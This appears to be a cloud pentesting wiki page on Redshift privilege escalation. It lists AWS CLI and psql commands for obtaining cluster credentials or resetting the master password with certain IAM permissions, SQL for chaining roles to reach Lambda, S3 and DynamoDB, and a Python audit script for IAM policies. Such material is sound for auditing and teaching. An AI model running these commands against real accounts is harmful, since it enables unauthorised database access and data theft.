AWS - Redshift Privesc

Redshift

For more information about RDS check:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

With these permissions you can get information about all the clusters (including the cluster name and the cluster username) and get credentials to access them:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potential Impact: Find sensitive information inside the databases.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

With these permissions you can get information about all the clusters and get credentials to access them. Note that the postgres user will have the permissions that the IAM identity used to obtain the credentials has.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Potential Impact: Find sensitive information inside the databases.

redshift:DescribeClusters, redshift:ModifyCluster?

It's possible to modify the master password of the internal postgres (redshift) user from the aws cli (I think those are the permissions you need, but I haven't tested them yet):

aws redshift modify-cluster --cluster-identifier <identifier-for-the-cluster> --master-user-password 'master-password';

Potential Impact: Find sensitive information inside the databases.
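
To audit for the three permission sets above from the defender's side, the following added example (not part of the original page) checks an IAM policy document for them. It only reads Allow statements that use an Action element; Deny, NotAction, Condition and Resource scoping are not evaluated, and the path labels and SAMPLE_POLICY are constructed for illustration.

```python
import fnmatch

# Permission sets listed on this page (the dictionary keys are hypothetical labels).
# The ModifyCluster set is marked as untested on the page.
PATHS = {
    "temp-db-credentials": ["redshift:DescribeClusters", "redshift:GetClusterCredentials"],
    "iam-mapped-credentials": ["redshift:DescribeClusters", "redshift:GetClusterCredentialsWithIAM"],
    "master-password-reset": ["redshift:DescribeClusters", "redshift:ModifyCluster"],
}

# Constructed sample policy: wildcard Describe*, odd casing, and a Deny statement.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["redshift:Describe*", "redshift:getclustercredentials"], "Resource": "*"},
        {"Effect": "Deny", "Action": "redshift:ModifyCluster", "Resource": "*"},
    ],
}


def _as_list(value):
    """IAM accepts either a single value or a list for Statement and Action."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allowed_patterns(policy):
    """Collect the lower-cased Action patterns of every Allow statement."""
    patterns = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") == "Allow":
            patterns += [a.lower() for a in _as_list(stmt.get("Action"))]
    return patterns


def is_allowed(action, patterns):
    """IAM action names match case-insensitively and support * and ? wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)


def risky_paths(policy):
    """Return the labels of the page's permission sets that the policy fully grants."""
    patterns = allowed_patterns(policy)
    return sorted(name for name, needed in PATHS.items()
                  if all(is_allowed(a, patterns) for a in needed))
```

A match means the policy deserves a closer look, for example scoping redshift:GetClusterCredentials to specific dbuser resources instead of "*".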

Accessing External Services

To access all of the following resources, you will need to specify the role to use. A Redshift cluster can have a list of AWS roles assigned that you can use if you know the ARN, or you can just set "default" to use the default one assigned.

Moreover, as explained here, Redshift also allows chaining roles (as long as the first one can assume the second one) to get further access by separating them with a comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

As explained in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, it's possible to call a lambda function from redshift with something like:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, it's possible to read from and write to S3 buckets:

-- Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

-- Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, it's possible to get data from dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the REGION option to specify the AWS Region in which the Amazon DynamoDB table is located.

EMR

Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html
